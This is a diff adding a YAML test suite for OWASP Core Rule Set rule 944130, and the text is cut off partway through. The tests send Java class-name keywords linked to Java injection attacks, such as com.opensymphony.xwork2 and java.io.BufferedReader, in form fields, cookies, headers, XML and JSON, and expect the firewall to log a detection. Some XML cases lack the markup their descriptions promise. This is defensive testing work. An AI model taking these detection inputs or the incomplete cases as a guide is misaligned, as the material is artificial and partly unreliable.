@@ -0,0 +1,8063 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944130.yaml" + description: "Positive tests for rule 944130" +tests: + - test_title: 944130-1 + desc: "Argument test includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_title: 944130-2 + desc: "Argument name includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-3 + desc: "Cookie test includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=com.opensymphony.xwork2 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-4 + desc: "Cookie name includes keyword com.opensymphony.xwork2" + stages: 
+ - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: com.opensymphony.xwork2=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-5 + desc: "Request header test includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: com.opensymphony.xwork2 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-6 + desc: "XML attribute value includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-7 + desc: "XML element value includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_title: 944130-8 + desc: "Nested XML element value includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_title: 944130-9 + desc: "Content-Type text/plain includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_title: 944130-10 + desc: "Content-Type application/json arg value includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"com.opensymphony.xwork2\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-11 + desc: "Content-Type 
application/json arg name includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"com.opensymphony.xwork2\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-12 + desc: "Argument test includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_title: 944130-13 + desc: "Argument name includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "com.sun.org.apache=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-14 + desc: "Cookie test includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=com.sun.org.apache + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-15 + desc: "Cookie name includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: com.sun.org.apache=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-16 + desc: "Request header test includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: com.sun.org.apache + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-17 + desc: "XML attribute value includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + 
version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-18 + desc: "XML element value includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_title: 944130-19 + desc: "Nested XML element value includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_title: 944130-20 + desc: "Content-Type text/plain includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_title: 944130-21 + desc: "Content-Type application/json arg value includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"com.sun.org.apache\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-22 + desc: "Content-Type application/json arg name includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"com.sun.org.apache\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-23 + desc: "Argument test includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-24 + desc: "Argument name includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + 
version: "HTTP/1.0" + data: "java.io.BufferedInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-25 + desc: "Cookie test includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.BufferedInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-26 + desc: "Cookie name includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.BufferedInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-27 + desc: "Request header test includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.BufferedInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-28 + desc: "XML attribute value includes keyword 
java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-29 + desc: "XML element value includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-30 + desc: "Nested XML element value includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-31 + desc: "Content-Type text/plain includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-32 + desc: "Content-Type application/json arg value includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.BufferedInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-33 + desc: "Content-Type application/json arg name includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.BufferedInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-34 + desc: "Argument test includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - 
test_title: 944130-35 + desc: "Argument name includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-36 + desc: "Cookie test includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.BufferedReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-37 + desc: "Cookie name includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.BufferedReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-38 + desc: "Request header test includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.BufferedReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-39 + desc: "XML attribute value includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-40 + desc: "XML element value includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-41 + desc: "Nested XML element value includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedReader" + 
output: + log_contains: "id \"944130\"" + - test_title: 944130-42 + desc: "Content-Type text/plain includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-43 + desc: "Content-Type application/json arg value includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.BufferedReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-44 + desc: "Content-Type application/json arg name includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.BufferedReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-45 + desc: "Argument test includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-46 + desc: "Argument name includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-47 + desc: "Cookie test includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ByteArrayInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-48 + desc: "Cookie name includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ByteArrayInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-49 + desc: "Request header test includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ByteArrayInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-50 + desc: "XML attribute value includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-51 + desc: "XML element value includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-52 + desc: "Nested XML 
